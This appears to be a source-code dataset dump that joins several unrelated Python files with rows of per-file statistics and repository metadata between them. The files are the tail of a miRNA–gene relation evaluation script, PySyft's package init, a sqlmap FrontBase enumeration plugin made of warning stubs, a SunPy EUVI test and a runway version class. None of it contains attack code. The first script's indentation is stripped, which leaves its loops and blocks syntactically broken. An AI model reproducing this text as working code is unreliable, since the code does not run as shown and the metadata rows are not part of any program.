('23113351','miR-29a','E2F3','MIR_GENE'),
('23113351','miR-29a','E2F1','MIR_GENE'), # possibly too
('23113351','miR-29a','E2F3','MIR_GENE'), # possibly too
('23148210','miR-210','HIF1A','GENE_MIR'), # was actived in ...-dependant
('23169590','miR-451','IL6','GENE_MIR'),
('23169590','miR-451','IFNA1','GENE_MIR'), #type I IFN
('23169590','miR-451','YWHAZ','MIR_GENE'),
('23169590','miR-451','YWHAD','MIR_GENE'), # has syn YWHAZ
#('23169590','miR-451','14-3-3zeta','MIR_GENE'), # is YWHAZ
('23169590','miR-451','ZFP36','MIR_GENE'),
#Three types of primary DCs treated with antisense RNA antagomirs directed against miR-451 secreted elevated levels of IL-6, TNF, CCL5/RANTES, and CCL3/MIP1alpha, and these results were confirmed using miR-451(null) cells.
#this suggests that miR-451 suppresses these genes normalls
('23169590','miR-451','IL6','MIR_GENE'),
('23169590','miR-451','CCL3','MIR_GENE'),
('23169590','miR-451','CCL5','MIR_GENE'),
('23169590','miR-451','IL6','MIR_GENE'),
('23169590','miR-451','IFNB2','MIR_GENE'), #IL6
('23169590','miR-451','TNF','MIR_GENE'),
('23169590','miR-451','TNFA','MIR_GENE'), #TNF
#miR-451 levels are themselves increased by IL-6 and type I IFN, potentially forming a regulatory loop.
('23169590','miR-451','IL6','GENE_MIR'), #IL6
('23169590','miR-451','IFNA1','GENE_MIR'), #type I IFN
('23169590','miR-451','IFNB2','GENE_MIR'), #IL6
('23190607','miR-203','RAN','MIR_GENE'),
('23190607','miR-203','RAPH1','MIR_GENE'),
('23190607','miR-203','ALS2CR18','MIR_GENE'), # synonym
('23190608','miR-29b','SP1','GENE_MIR'),
('23190608','miR-29b','SP1','MIR_GENE'), # mirtex missing: miR-29b sensitizes multiple myeloma cells to bortezomib-induced apoptosis through the activation of a feedback loop with the transcription factor Sp1.
('23190608','miR-29b','DAND5','GENE_MIR'), # DAND5 has SP1 as syn
('23190608','miR-29b','DAND5','MIR_GENE'),
('23206698','miR-7','IRS2','MIR_GENE'),
('23396109','miR-17','PTEN','MIR_GENE'), #miR-17~92
('23396109','miR-17','MHAM','MIR_GENE'), # MHAM syn is PTEN too
('23396109','miR-17','BZS','MIR_GENE'), # BZS syn is PTEN too
#('23396109','miR-17','BIM','MIR_GENE'), # miR-17~92 is pten
('23396109','miR-17','BCL2L11','MIR_GENE'), # BCL2L11 syn is BIM
('23472202','miR-183','TAOK1','MIR_GENE'),
('23516615','miR-143','ERK5','MIR_GENE'),
('23516615','miR-143','PPARg','MIR_GENE'),
('23516615','miR-204','ERK5','MIR_GENE'),
('23516615','miR-204','PPARg','MIR_GENE'),
('23519125','miR-125a','erbB2','MIR_GENE'),
('23519125','miR-125a','erbB3','MIR_GENE'),
('23519125','miR-125b','erbB2','MIR_GENE'),
('23519125','miR-125b','erbB3','MIR_GENE'),
('23519125','miR-205','erbB2','MIR_GENE'),
('23519125','miR-205','erbB3','MIR_GENE'),
# these are no genes!
#('23527070','miR-21','collagen I','MIR_GENE'),
#('23527070','miR-21','collagen III','MIR_GENE'),
('23527070','miR-21','ELN','MIR_GENE'),
('23527070','miR-21','SMAD7','MIR_GENE'),
('23527070','miR-21','SMAD5','MIR_GENE'),
('23527070','miR-21','SMAD2','MIR_GENE'),
#('23534973','miR-152','HLA-G','MIR_GENE'), not a specific miRNA: miR-152 family
('23579289','miR-214','SP7','MIR_GENE'),
('23583389','miR-96','IRS1','MIR_GENE'),
('23592910','miR-146a','IL1B','GENE_MIR'),
('23592910','miR-146a','IFNG','GENE_MIR'),
#('23592910','miR-146a','TNFA','GENE_MIR'), # is TNF
('23592910','miR-146b','IL1B','GENE_MIR'),
('23592910','miR-146b','IFNG','GENE_MIR'),
('23592910','miR-146b','TNF','GENE_MIR'),
('23592910','miR-146a','IRAK','MIR_GENE'),
('23592910','miR-146b','IRAK','MIR_GENE'),
('23611780','miR-106b','FBXW11','MIR_GENE'), #beta-TRCP2
#('23611780','miR-106b','SNAIL','MIR_GENE'), nope. means cluster + indirect: miR-106b-25 cluster may play an important role in the metastasis of human non-small cell lung cancer cells by directly suppressing the beta-TRCP2 gene expression with a consequent increase in the expression of Snail.
('23611780','miR-93','FBXW11','MIR_GENE'),
('23630358','miR-155','MSR1','MIR_GENE'), # SR-AI syn
('23643257','miR-424','FGR','MIR_GENE'),
('23643257','miR-424','MAP2K1','MIR_GENE'),
('23643257','miR-424','MAPK1','MIR_GENE'), #mitogen-activated protein kinase 1
('23667495','miR-224','DPYSL2','MIR_GENE'),
('23667495','miR-224','KRAS','MIR_GENE'),
('23667495','miR-452','DPYSL2','MIR_GENE'),
('23667495','miR-452','KRAS','MIR_GENE'),
('23667495','miR-181c','KRAS','MIR_GENE'),
('23667495','miR-340','MECP2','MIR_GENE'),
('23667495','miR-181c','MECP2','MIR_GENE'),
('23667495','miR-340','KRAS','MIR_GENE'),
('23759586','miR-34a','SIRT1','MIR_GENE'),
('23759586','miR-125b','TP53','MIR_GENE'),
('23759586','miR-125b','SIRT1','MIR_GENE'),
('23797704','miR-21','TIMP3','MIR_GENE'),
('23797704','miR-221','TIMP3','MIR_GENE'),
('23797704','miR-21','SFD','MIR_GENE'),#is TIMP3
('23797704','miR-221','SFD','MIR_GENE'),#is TIMP3
('23797704','miR-217','TIMP3','MIR_GENE'),
('23797704','miR-217','SFD','MIR_GENE'), #is TIMP3
('23797704','miR-217','SIRT1','MIR_GENE'),
('23836497','miR-20','STAT3','MIR_GENE'),
('23836497','miR-20','CCND1','MIR_GENE'),
('23836497','miR-106a','STAT3','MIR_GENE'),
('23836497','miR-106a','CCND1','MIR_GENE'),
# same genesymbols
('23846856','miR-875','PRDX3','MIR_GENE'),
('23846856','miR-875','PRX','MIR_GENE'),
('23851184','miR-200b','WNT1','MIR_GENE'),
('23851184','miR-22','WNT1','MIR_GENE'),
('23895517','mir-494','TNFSF14','MIR_GENE'),
('23895517','mir-197','TNFSF14','MIR_GENE'),
('23968734','miR-133a','PDLIM5','MIR_GENE'), # LIM
#('23968734','miR-133a','SH3 protein 1','MIR_GENE'),
('23968734','miR-133a','LASP1','MIR_GENE'), #SH3 protein 1
('24006456','miR-29b','IGF1','MIR_GENE'),
('24006456','miR-30c','IGF1','MIR_GENE'),
('24006456','miR-29b','LIF','MIR_GENE'),
('24006456','miR-30c','LIF','MIR_GENE'),
('24006456','miR-29b','PTX3','MIR_GENE'),
('24023867','miR-135a','NR3C2','MIR_GENE'),
('24023867','miR-124','NR3C2','MIR_GENE'),
('24145190','miR-203','SNAI1','GENE_MIR'),
('24145190','miR-203','CD44','MIR_GENE'), # new, not in mirtex: we found that the levels of several EMT activators and miR-203 were positively and negatively correlated with those of CD44, respectively.
('24145190','miR-203','MDU3','MIR_GENE'),
('24145190','miR-203','MIC4','MIR_GENE'),
('24145190','miR-203','MDU2','MIR_GENE'),
('24145190','miR-203','SRC','GENE_MIR'), # missing in mirtex: Finally, we discovered that c-Src kinase activity was required for the downregulation of miR-203
('24155920','miR-21','SPRY1','MIR_GENE'),
('24155920','miR-29a','MCL1','MIR_GENE'),
('24155920','miR-29b','MCL1','MIR_GENE'),
#('24219008','miR-21-5p','TGFBR3','MIR_GENE'),
('24219008','miR-21','TGFBR3','MIR_GENE'), #add
('24219008','hsa-miR-21','TGFBR3','MIR_GENE'), #add
#('24219008','miR-21-5p','PDGFD','MIR_GENE'),
('24219008','miR-21','PDGFD','MIR_GENE'),
('24219008','hsa-miR-21','PDGFD','MIR_GENE'), #add
#('24219008','miR-21-5p','PPM1L','MIR_GENE'),
('24219008','miR-21','PPM1L','MIR_GENE'),
('24219008','hsa-miR-21','PPM1L','MIR_GENE'), #add
#('24219008','miR-181a-5p','ROPN1L','MIR_GENE'),
('24219008','miR-181a','ROPN1L','MIR_GENE'),
('24219008','hsa-miR-181a','ROPN1L','MIR_GENE'),
#('24219008','miR-181a-5p','SLC37A3','MIR_GENE'),
('24219008','hsa-miR-181a','SLC37A3','MIR_GENE'),
('24219008','miR-181a','SLC37A3','MIR_GENE'),
#('24219008','miR-24-2-5p','MYC','MIR_GENE'),
('24219008','hsa-miR-24-2','MYC','MIR_GENE'),
('24219008','hsa-miR-24','MYC','MIR_GENE'),
('24219008','miR-24-2','MYC','MIR_GENE'),
('24219008','miR-24','MYC','MIR_GENE'),
#('24219008','miR-24-2-5p','KCNJ2','MIR_GENE'),
('24219008','hsa-miR-24-2','KCNJ2','MIR_GENE'),
('24219008','hsa-miR-24','KCNJ2','MIR_GENE'),
('24219008','miR-24','KCNJ2','MIR_GENE'),
('24219008','miR-24-2','KCNJ2','MIR_GENE'),
('24219349','miR-203','BMI1','MIR_GENE'),
('24220339','miR-490','FOS','MIR_GENE'),
('24223656','miR-31','RASA1','MIR_GENE'),
('24314216','miR-106','TP53','MIR_GENE'),
('24319262','miR-34a','TP53','GENE_MIR'),
('24319262','miR-145','TP53','GENE_MIR'),
('24319262','miR-155','MAF','MIR_GENE'),
('24319262','miR-34a','TWIST2','MIR_GENE'),
('24319262','miR-34a','MAF','MIR_GENE'),
('24319262','miR-145','TWIST2','MIR_GENE'),
('24319262','miR-145','MAF','MIR_GENE'),
('24330780','miR-124','FLOT1','MIR_GENE'),
('24330780','miR-124','FLOT1','MIR_GENE'),
('24376808','miR-146a','CRK','MIR_GENE'),
('24376808','miR-424','CRK','MIR_GENE'),
('24376808','miR-146a','EGFR','MIR_GENE'),
('24376808','miR-424','EGFR','MIR_GENE'),
('24376808','miR-146a','MAPK14','MIR_GENE'), #p38 / ERK
('24376808','miR-424','MAPK14','MIR_GENE'),
('24376808','miR-146a','AIMP2','MIR_GENE'),#p38 / ERK
('24376808','miR-424','AIMP2','MIR_GENE'),
('24376808','miR-146a','AHSA1','MIR_GENE'),#p38 / ERK
('24376808','miR-424','AHSA1','MIR_GENE'),
]
refDict = defaultdict(set)
for x in referenceSolution:
refDict[x[0]].add((x[1], x[2], x[3]))
tmRemoveTMErrors = {
('19956414','miR-29b','MMRN1'), # ECM, extracellular matrix
('21415212','miR-486','GC'), #gastric cancer
('21415212','miR-486','HTC2'), #Array-CGH
('21415212','miR-486','EAF2'), #TRAITS
('21415212','miR-486','NF2'), #SCH cell line
('21703983', 'miR-632', 'PAFAH1B1'), # Notably, hsa-miR-378, hsa-miR-632, and hsa-miR-636 demonstrated particularly high discrimination between MDS and normal controls. MDS here is myelodysplastic syndromes
('21703983', 'hsa-miR-378', 'PAFAH1B1'),
('21703983', 'miR-378', 'PAFAH1B1'),
('21703983', 'hsa-miR-632', 'PAFAH1B1'),
('21703983', 'hsa-miR-636', 'PAFAH1B1'),
('21703983', 'miR-636', 'PAFAH1B1'),
('22066022', 'miR-21', 'FAM126A'), # HCC refers to hepatocellular carcinoma
('22066022', 'miR-21', 'ST14'), # HAI refers to histological activity index (HAI)
('22066022', 'miR-21', 'SPINT1'), # HAI refers to histological activity index (HAI)
('23643257','miR-424','FGR'), # recognizes FGR
('23643257','miR-424','FGFR1'),
('23643257','miR-424','KAL2'),
('23643257','miR-424','FLT2'),
('24330780','miR-124','TENM1'), #tumor node metastasis (TNM)
('24330780','miR-124','TNM'),
('24223656', 'miR-31', "TPT1"), # RAS p21 GTPase activating protein 1 (RASA1) => p21
('24223656', 'miR-31', "CDKN1A"),
('24223656', 'miR-31', "H3F3AP6"),
('24223656', 'miR-31', "TCEAL1"),
('24223656', 'miR-31', "NSG1"),
('21609717','miR-98','MT-CO2'), # accepts COX-2
('21609717','miR-98','COX8A'),
('21609717','miR-98','CPOX'),
('21609717','miR-98','MT-CO2'),
('23527070', 'miR-21', 'SMAD5'), # SMAD2/5
('23190608','miR-29b','SUPT20H'), # SUPT20H has transcription-factor as syn
('23190608','miR-29b','SUPT20H'),
('18185580','miR-335', 'SUPT20H'),
('23113351','miR-29','RB1'), # RB1 syn: osteosarcoma
('23113351','miR-29a','RB1'), # RB1 syn: osteosarcoma
('23113351','miR-29b','RB1'), # RB1 syn: osteosarcoma
('22982443','miR-200c','CDH17'), # CDH17 syn for cadherin, found in E-cadherin ...
('20603081','miR-150','GLI2'), # THP-1 refers to cells
('22139444', 'miR-30c', 'NDC80'), # refers to HEC-1-B cells ...
('23041385', 'miR-21', 'CO'), # centenarian offspring (CO)
('23041385', 'miR-21', 'CALCR'), # CTR control
('19723773','miR-290','MEF'),#mouse embryo fibroblasts (MEF)
('19723773','miR-290','MEFV'),#mouse embryo fibroblasts (MEF)
('19723773','miR-290','ELF4'),#mouse embryo fibroblasts (MEF)
('19547998', 'miR-21', 'CALR'), # SSA
('19547998', 'miR-181b', 'CALR'),
('19547998', 'miR-21', 'HP'), # hyperplastic polyps
('19547998', 'miR-181b', 'HP'),
('20103675', 'miR-222', 'FAM126A'), # HCC cell lines
('24219349','miR-203','SP'), # side population
('24219349','miR-203','TFF2'), # SP
('21088996','miR-21','BLOC1S6'), # PDAC cells (MIA-Pa-Ca-2)
('21088996','miR-21','MIA'), # PDAC cells (MIA-Pa-Ca-2)
('21088996','miR-21','CAR2'), # PDAC cells (MIA-Pa-Ca-2)
('22847613','miR-130b','SLC22A3'), # epithelial-mesenchymal transition (EMT)
('22847613','miR-130b','ITK'), # epithelial-mesenchymal transition (EMT)
('22925189', 'miR-370', 'II'), #stage II <=> gene symbol
('22925189', 'miR-370', 'IV'), #stage IV <=> gene symbol
('22925189', 'miR-30a', 'II'), #stage II <=> gene symbol
('22925189', 'miR-30a', 'IV'), #stage IV <=> gene symbol
('23592910', 'miR-146a', 'IFNA1'), # TM mismatch with interferon in interfon gamma
('23592910', 'miR-146b', 'IFNA1'),
('24006456','miR-29b','INS'), # spurious hit with insulin-like growth factor
('24006456','miR-30c','INS'), # insulin-like
('20945501', 'miR-141', 'PC'), # matches PC / prostate cancer
('20945501', 'miR-141', 'PODXL'), # matches CRPC (castration-resitant prostate cancer)
}
# gene-mir: 36 F1: 0.88 *0.135 = 0,1188
# mir-gene: 230 F1: 0.94 *0.865 = 0,8131
# all: F1: 0.9319
sent2rels = defaultdict(set)
allSents = sentDB.get_all_sentences()
doc2Rels = defaultdict(set)
for mirID in mmuDB.ltype2rel:
for rel in mmuDB.ltype2rel[mirID]:
jel = rel.toJSON()
sent2rels[rel.assocSent].add( (rel.lid, rel.rid, rel.assocInt, rel.assocCat, rel.lPOS, rel.rPOS) )
docID = rel.assocSent.split(".")[0]
doc2Rels[docID].add((rel.lid, rel.rid, rel.assocInt) )
for mirID in hsaDB.ltype2rel:
for rel in hsaDB.ltype2rel[mirID]:
jel = rel.toJSON()
sent2rels[rel.assocSent].add( (rel.lid, rel.rid, rel.assocInt, rel.assocCat, rel.lPOS, rel.rPOS) )
#print(rel.assocSent, rel.lid, rel.rid, rel.assocInt, rel.assocCat, relSent)
docID = rel.assocSent.split(".")[0]
doc2Rels[docID].add((rel.lid, rel.rid, rel.assocInt) )
from collections import Counter
#TM, REF
elemCaseCounter = Counter()
with open("test_list.bydoc.tsv", "w") as fout:
print("doc", "lid", "rid", "assocInt", sep="\t", file=fout)
allDocIDs = set([x.split(".")[0] for x in allSents])
for docID in natsorted(doc2Rels):
for elems in doc2Rels[docID]:
print(docID, *elems, sep="\t", file=fout)
refOnly = refDict[docID].difference(doc2Rels[docID])
tmOnly = doc2Rels[docID].difference(refDict[docID])
tmOnly = [x for x in tmOnly if not (docID, x[0], x[1]) in tmRemoveTMErrors]
correct = refDict[docID].intersection(doc2Rels[docID])
for x in correct:
elemCaseCounter[(True, True)] += 1
for x in refOnly:
elemCaseCounter[(False, True)] += 1
for x in tmOnly:
elemCaseCounter[(True, False)] += 1
if len(doc2Rels[docID]) == 0 and len(refDict[docID]):
continue
if len(refOnly) == 0 and len(tmOnly) == 0:
continue
print(docID, len(correct), "REFONLY", refOnly)
print(docID, len(correct), "TMONLY", tmOnly)
print()
precision = elemCaseCounter[(True, True)] / (elemCaseCounter[(True, True)]+elemCaseCounter[(True, False)])
recall = elemCaseCounter[(True, True)] / (elemCaseCounter[(True, True)]+elemCaseCounter[(False, True)])
f1 = 2* precision * recall / (precision+recall)
#specificity = elemCaseCounter[(False, False)] / (elemCaseCounter[(True, False)] + elemCaseCounter[(False, False)])
print()
print()
print("True, True", elemCaseCounter[(True, True)])
print("TM Only", elemCaseCounter[(True, False)])
print("Ref Only", elemCaseCounter[(False, True)])
print()
print("precision", precision)
print("recall", recall)
#print("specificity", specificity)
print("f1", f1)
with open("test_list.tsv", "w") as fout:
print("lid", "rid", "assocInt", "assocCat", "lpos", "rpos", "int_eval", "cat_eval", "sentID", "sent", sep="\t", file=fout)
for sentID in natsorted([x for x in allSents]):
sent = allSents[sentID]
allElems = sent2rels.get(sentID, None)
if allElems == None:
allElems = [ ("", "", "", "", "", "") ]
for lid, rid, assocInt, assocCat, lpos, rpos in allElems:
print(lid, rid, assocInt, assocCat, lpos, rpos, "FALSE", "FALSE", sentID, sent, sep="\t", file=fout)
| 40.963057 | 327 | 0.645572 | 4,524 | 32,156 | 4.490937 | 0.210212 | 0.124723 | 0.011813 | 0.015947 | 0.478663 | 0.22838 | 0.173155 | 0.121819 | 0.10282 | 0.078456 | 0 | 0.209179 | 0.091336 | 32,156 | 784 | 328 | 41.015306 | 0.486156 | 0.251586 | 0 | 0.058288 | 0 | 0 | 0.542566 | 0.005449 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.01275 | 0 | 0.01275 | 0.029144 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
8a8f3bc0b8648f6599b0f3f876b158891ab5ef13 | 267 | py | Python | huntserver/management/commands/runupdates.py | adenylyl/pi_day_puzzle_hunt | aa01cef427bc5f524e89558da72a2f79b0c78514 | [
"MIT"
] | 18 | 2017-03-07T19:53:03.000Z | 2022-02-24T04:58:47.000Z | huntserver/management/commands/runupdates.py | adenylyl/pi_day_puzzle_hunt | aa01cef427bc5f524e89558da72a2f79b0c78514 | [
"MIT"
] | 161 | 2016-11-14T00:04:42.000Z | 2021-06-10T17:25:17.000Z | huntserver/management/commands/runupdates.py | adenylyl/pi_day_puzzle_hunt | aa01cef427bc5f524e89558da72a2f79b0c78514 | [
"MIT"
] | 22 | 2016-09-27T18:00:10.000Z | 2022-03-13T17:51:44.000Z | from django.core.management.base import BaseCommand
from huntserver.utils import update_time_items
class RunUpdates(BaseCommand):
help = 'Runs all time related updates for the huntserver app'
def handle(self, *args, **options):
update_time_items()
| 26.7 | 65 | 0.756554 | 35 | 267 | 5.657143 | 0.771429 | 0.10101 | 0.151515 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.168539 | 267 | 9 | 66 | 29.666667 | 0.891892 | 0 | 0 | 0 | 0 | 0 | 0.194757 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.166667 | false | 0 | 0.333333 | 0 | 0.833333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
8a98d4ac7dc115c2d7e6592d4b52a67512d27207 | 4,185 | py | Python | src/syft/__init__.py | aeroaks/PySyft | 88220c38faf3cd72ddc63c73f3c0533695df53c9 | [
"Apache-2.0"
] | null | null | null | src/syft/__init__.py | aeroaks/PySyft | 88220c38faf3cd72ddc63c73f3c0533695df53c9 | [
"Apache-2.0"
] | null | null | null | src/syft/__init__.py | aeroaks/PySyft | 88220c38faf3cd72ddc63c73f3c0533695df53c9 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Welcome to the syft package! This package is the primary package for PySyft.
This package has two kinds of attributes: submodules and convenience functions.
Submodules are configured in the standard way, but the convenience
functions exist to allow for a convenient `import syft as sy` to then expose
the most-used functionalities directly on syft. Note that this way of importing
PySyft is the strict convention in this codebase. (Do no simply call
`import syft` and then directly use `syft.<method>`.)
The syft module is split into two distinct groups of functionality which we casually refer to
as syft "core" and syft "python". "core" functionality is functionality which is designed
to be universal across all Syft languages (javascript, kotlin, swift, etc.).
Syft "python" includes all functionality which by its very nature cannot be
truly polyglot. Syft "core" functionality includes the following modules:
* :py:mod:`syft.core.node` - APIs for interacting with remote machines you do not directly control.
* :py:mod:`syft.core.message` - APIs for serializing messages sent between Client and Node classes.
* :py:mod:`syft.core.pointer` - Client side API for referring to objects on a Node
* :py:mod:`syft.core.store` - Server side API for referring to object storage on a node (things pointers point to)
Syft "python" functionality includes the following modules:
* :py:mod:`syft.ast` - code generates external library common syntax tree using an allowlist list of methods
* :py:mod:`syft.typecheck` - automatically checks and enforces Python type hints and the exclusive use of kwargs.
* :py:mod:`syft.lib` - uses the ast library to dynamically create remote execution APIs for supported Python libs.
IMPORTANT: syft.core should be very careful when importing functionality from outside of syft
core!!! Since we plan to drop syft core down to a language (such as C++ or Rust)
this can create future complications with lower level languages calling
higher level ones.
To begin your education in Syft, continue to the :py:mod:`syft.core.node.vm.vm` module...
"""
# stdlib
from pathlib import Path
import sys
# third party
from pkg_resources import DistributionNotFound # noqa: F401
from pkg_resources import get_distribution # noqa: F401
# syft absolute
# ASTRACT OBJECT IMPORTS
from syft.core import common # noqa: F401
from syft.core.common import event_loop # noqa: F401
# Convenience Methods
from syft.core.common.serde.deserialize import _deserialize as deserialize # noqa: F401
from syft.core.common.serde.serialize import _serialize as serialize # noqa: F401
from syft.core.node.common.service.repr_service import ReprMessage # noqa: F401
from syft.core.node.device.device import Device # noqa: F401
from syft.core.node.device.device import DeviceClient # noqa: F401
from syft.core.node.domain.domain import Domain # noqa: F401
from syft.core.node.domain.domain import DomainClient # noqa: F401
from syft.core.node.network.network import Network # noqa: F401
from syft.core.node.network.network import NetworkClient # noqa: F401
# Convenience Constructors
from syft.core.node.vm.vm import VirtualMachine # noqa: F401
from syft.core.node.vm.vm import VirtualMachineClient # noqa: F401
# Convenience Functions
from syft.decorators import type_hints # noqa: F401
from syft.grid.duet import bcolors # noqa: F401
from syft.grid.duet import duet # noqa: F401
from syft.grid.duet import join_duet # noqa: F401
from syft.grid.duet import launch_duet # noqa: F401
# Convenience Objects
from syft.lib import lib_ast # noqa: F401
from syft.lib import load_lib # noqa: F401
from syft.lib.torch.module import Module # noqa: F401
# syft relative
# Package Imports
from . import lib # noqa: F401
from . import logger # noqa: F401
# VERSIONING
try:
# Change here if project is renamed and does not equal the package name
dist_name = __name__
__version__ = get_distribution(dist_name).version
except DistributionNotFound:
__version__ = "unknown"
finally:
del get_distribution, DistributionNotFound
sys.path.append(str(Path(__file__)))
logger.add(sink=sys.stderr, level="CRITICAL")
| 44.521277 | 114 | 0.774194 | 627 | 4,185 | 5.116427 | 0.379585 | 0.062344 | 0.067332 | 0.079801 | 0.235349 | 0.192643 | 0.166459 | 0.131546 | 0.079801 | 0 | 0 | 0.021457 | 0.153644 | 4,185 | 93 | 115 | 45 | 0.884246 | 0.630824 | 0 | 0 | 0 | 0 | 0.01 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.75 | 0 | 0.75 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
8a9f8e3b371f4a3d8597afaef08cf1cd3f5dcb90 | 910 | py | Python | packages/sqlmap-master/plugins/dbms/frontbase/enumeration.py | ZooAtmosphereGroup/HelloPackages | 0ccffd33bf927b13d28c8f715ed35004c33465d9 | [
"Apache-2.0"
] | null | null | null | packages/sqlmap-master/plugins/dbms/frontbase/enumeration.py | ZooAtmosphereGroup/HelloPackages | 0ccffd33bf927b13d28c8f715ed35004c33465d9 | [
"Apache-2.0"
] | null | null | null | packages/sqlmap-master/plugins/dbms/frontbase/enumeration.py | ZooAtmosphereGroup/HelloPackages | 0ccffd33bf927b13d28c8f715ed35004c33465d9 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
"""
Copyright (c) 2006-2021 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
from lib.core.data import logger
from plugins.generic.enumeration import Enumeration as GenericEnumeration
class Enumeration(GenericEnumeration):
def getBanner(self):
warnMsg = "on FrontBase it is not possible to get the banner"
logger.warn(warnMsg)
return None
def getPrivileges(self, *args, **kwargs):
warnMsg = "on FrontBase it is not possible to enumerate the user privileges"
logger.warn(warnMsg)
return {}
def getHostname(self):
warnMsg = "on FrontBase it is not possible to enumerate the hostname"
logger.warn(warnMsg)
def getStatements(self):
warnMsg = "on FrontBase it is not possible to enumerate the SQL statements"
logger.warn(warnMsg)
return []
| 27.575758 | 84 | 0.684615 | 113 | 910 | 5.513274 | 0.513274 | 0.057785 | 0.11557 | 0.128411 | 0.301766 | 0.301766 | 0.301766 | 0.301766 | 0.301766 | 0.239165 | 0 | 0.011461 | 0.232967 | 910 | 32 | 85 | 28.4375 | 0.881089 | 0.141758 | 0 | 0.222222 | 0 | 0 | 0.301423 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.222222 | false | 0 | 0.111111 | 0 | 0.555556 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
8aac9198e1ca17cfd23654e404dcbbfca380cdae | 1,377 | py | Python | sunpy/map/sources/tests/test_euvi_source.py | PritishC/sunpy | 76a7b5994566674d85eada7dcec54bf0f120269a | [
"BSD-2-Clause"
] | null | null | null | sunpy/map/sources/tests/test_euvi_source.py | PritishC/sunpy | 76a7b5994566674d85eada7dcec54bf0f120269a | [
"BSD-2-Clause"
] | null | null | null | sunpy/map/sources/tests/test_euvi_source.py | PritishC/sunpy | 76a7b5994566674d85eada7dcec54bf0f120269a | [
"BSD-2-Clause"
] | null | null | null | """Test cases for STEREO Map subclasses.
This particular test file pertains to EUVIMap.
@Author: Pritish C. (VaticanCameos)
"""
import os
import glob
from sunpy.map.sources.stereo import EUVIMap
from sunpy.map import Map
from sunpy.sun import sun
import sunpy.data.test
path = sunpy.data.test.rootdir
fitspath = glob.glob(os.path.join(path, "euvi_20090615_000900_n4euA_s.fts"))
euvi = Map(fitspath)
# EUVI Tests
def test_fitstoEIT():
"""Tests the creation of EUVIMap using FITS."""
assert isinstance(euvi, EUVIMap)
def test_is_datasource_for():
"""Test the is_datasource_for method of EUVIMap.
Note that header data to be provided as an argument
can be a MetaDict object."""
assert euvi.is_datasource_for(euvi.data, euvi.meta)
def test_measurement():
"""Tests the measurement property of the EUVIMap object."""
assert euvi.measurement.value == 171
def test_observatory():
"""Tests the observatory property of the EUVIMap object."""
assert euvi.observatory == "STEREO A"
def test_rsun_obs():
"""Tests the rsun_obs property"""
assert euvi.rsun_obs.value == euvi.meta['rsun']
def test_rsun_missing():
"""Tests output if 'rsun' is missing"""
euvi_no_rsun = Map(fitspath)
euvi_no_rsun.meta['rsun'] = None
assert euvi_no_rsun.rsun_obs.value == sun.solar_semidiameter_angular_size(euvi.date).to('arcsec').value
| 29.934783 | 107 | 0.732752 | 203 | 1,377 | 4.82266 | 0.384236 | 0.042901 | 0.045965 | 0.040858 | 0.073544 | 0.073544 | 0.073544 | 0 | 0 | 0 | 0 | 0.015517 | 0.157589 | 1,377 | 45 | 108 | 30.6 | 0.828448 | 0.339869 | 0 | 0 | 0 | 0 | 0.0625 | 0.037037 | 0 | 0 | 0 | 0 | 0.26087 | 1 | 0.26087 | false | 0 | 0.26087 | 0 | 0.521739 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
8aaccd61826b3b9dd2b747e7dc1a8a8bd4442788 | 817 | py | Python | runway/utils/_version.py | onicagroup/runway | d50cac0e4878ff0691943029aa4f5b85d426a3b0 | [
"Apache-2.0"
] | 134 | 2018-02-26T21:35:23.000Z | 2022-03-03T00:30:27.000Z | runway/utils/_version.py | onicagroup/runway | d50cac0e4878ff0691943029aa4f5b85d426a3b0 | [
"Apache-2.0"
] | 937 | 2018-03-08T22:04:35.000Z | 2022-03-30T12:21:47.000Z | runway/utils/_version.py | onicagroup/runway | d50cac0e4878ff0691943029aa4f5b85d426a3b0 | [
"Apache-2.0"
] | 70 | 2018-02-26T23:48:11.000Z | 2022-03-02T18:44:30.000Z | """Version utilities."""
from __future__ import annotations
import packaging.version
class Version(packaging.version.Version):
"""Customize packagining.version.Version."""
def __init__(self, version: str) -> None:
"""Instantiate class.
Args:
version: Version string. (e.g. 1.0.0, v1.0.0)
"""
self._original_text = version
super().__init__(version)
def __repr__(self) -> str:
"""Return repr."""
# this usage of super is required to reproduce the intended result in
# any subclasses of this class
# pylint: disable=super-with-arguments
return f"<Version('{super(Version, self).__str__()}')>"
def __str__(self) -> str:
"""Return the original version string."""
return self._original_text
